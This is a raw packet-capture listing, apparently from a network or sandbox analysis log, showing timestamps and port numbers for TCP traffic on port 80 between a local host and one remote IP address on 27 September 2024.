Sep 27, 2024 04:14:12.010061026 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.010086060 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.010092974 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.010114908 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.010127068 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.010134935 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.010158062 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.010185957 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.010190010 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.010216951 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.010230064 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.010241985 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.010262966 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.010287046 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.010293961 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.010318041 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.010332108 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.010360003 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.010373116 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.010373116 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.010390997 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.010401011 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.010423899 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.010438919 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.010454893 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.010482073 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.010489941 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.010502100 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.010520935 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.010554075 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.010560036 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.010560989 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.010586977 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.010606050 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.010621071 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.010646105 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.010653973 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.010670900 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.010718107 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.132917881 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.132945061 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.132956028 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.132967949 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.133013964 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.133013964 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.133049965 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.133060932 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.133146048 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.133147955 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.133160114 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.133172035 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.133183956 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.133198023 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.133198023 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.133208990 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.133230925 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.133243084 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.133301973 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.133311987 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.133341074 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.133341074 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.133366108 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.133384943 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.133397102 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.133407116 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.133419037 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.133461952 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.133461952 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.133490086 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.133517981 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.133527994 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.133560896 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.133636951 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.133661032 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.133671999 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.133683920 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.133692026 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.133692980 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.133725882 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.133754015 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.133764982 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.133769989 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.133775949 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.133788109 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.133809090 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.133827925 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.133888960 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.133910894 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.133922100 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.133944988 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.133950949 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.133955956 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.133968115 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.133997917 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.134068966 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.134079933 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.134090900 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.134092093 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.134100914 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.134150982 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.134150982 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.134268999 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.134279966 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.134290934 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.134300947 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.134311914 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.134324074 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.134324074 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.134324074 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.134335041 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.134344101 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.134355068 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.134366035 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.134383917 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.134416103 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.134416103 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.134574890 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.134587049 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.134603024 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.134610891 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.134620905 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.134632111 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.134643078 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.134646893 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.134646893 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.134653091 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.134666920 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.134679079 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.134720087 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.134720087 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.134910107 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.134927034 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.134938002 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.134948969 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.134959936 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.134965897 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.134965897 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.134968996 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.134989023 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.134994984 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.135000944 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.135010958 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.135020018 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.135026932 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.135030985 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.135037899 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.135041952 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.135054111 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.135062933 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.135073900 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.135083914 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.135087967 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.135094881 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.135117054 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.135134935 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.135535002 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.135545969 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.135556936 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.135567904 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.135585070 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.135591030 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.135596991 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.135611057 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.135641098 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.135656118 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.135737896 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.135776997 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.135788918 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.135798931 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.135809898 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.135819912 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.135829926 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.135831118 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.135831118 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.135838985 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.135848999 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.135859013 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.135869026 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.135878086 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.135878086 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.135878086 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.135890007 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.135905027 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.135915995 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.135921001 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.135926008 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.135936975 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.135946989 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.135957003 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.135957956 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.135957956 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.135967016 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.135977983 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.135987043 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.135988951 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.136001110 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.136004925 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.136049032 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.136064053 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.225394011 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.225492954 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.225878000 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.225944042 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.258169889 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.258224010 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.258253098 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.258260012 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.258272886 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.258285999 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.258302927 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.258318901 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.258349895 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.258361101 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.258361101 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.258383036 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.258398056 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.258411884 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.258440018 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.258446932 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.258456945 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.258474112 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.258518934 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.258518934 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.258624077 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.258651018 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.258683920 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.258699894 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.258730888 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.258754015 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.258781910 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.258793116 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.258793116 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.258814096 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.258846045 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.258853912 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.258865118 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.258891106 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.259514093 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.259579897 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.259603024 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.259612083 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.259644032 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.259673119 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.259792089 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.259824038 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.259860992 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.259862900 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.259908915 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.259933949 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.259933949 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.259943008 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.259970903 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.259999990 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.259999990 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.260001898 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.260031939 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.260035038 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.260060072 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.260066032 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.260097980 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.260121107 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.260121107 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.260129929 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.260162115 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.260166883 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.260195017 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.260201931 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.260260105 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.260260105 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.260297060 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.260329008 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.260365963 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.260377884 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.260380983 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.260410070 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.260441065 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.260462046 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.260462046 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.260472059 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.260504007 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.260509968 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.260509968 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.260535955 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.260554075 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.260567904 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.260575056 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.260612011 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.260618925 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.260653019 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.260683060 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.260698080 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.260698080 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.260715008 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.260746002 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.260751963 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.260751963 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.260777950 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.260808945 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.260822058 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.260822058 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.260858059 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.260868073 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.260888100 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.260925055 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.260934114 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.260935068 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.260956049 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.260977030 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.260989904 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.261018038 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.261029959 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.261029959 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.261049032 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.261081934 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.261099100 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.261099100 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.261111975 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.261146069 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.261157990 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.261164904 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.261197090 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.261214018 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.261229992 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.261250019 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.261261940 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.261284113 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.261296034 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.261321068 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.261327982 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.261338949 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.261358976 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.261369944 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.261384964 CEST	80	49704	185.215.113.37	192.168.2.5
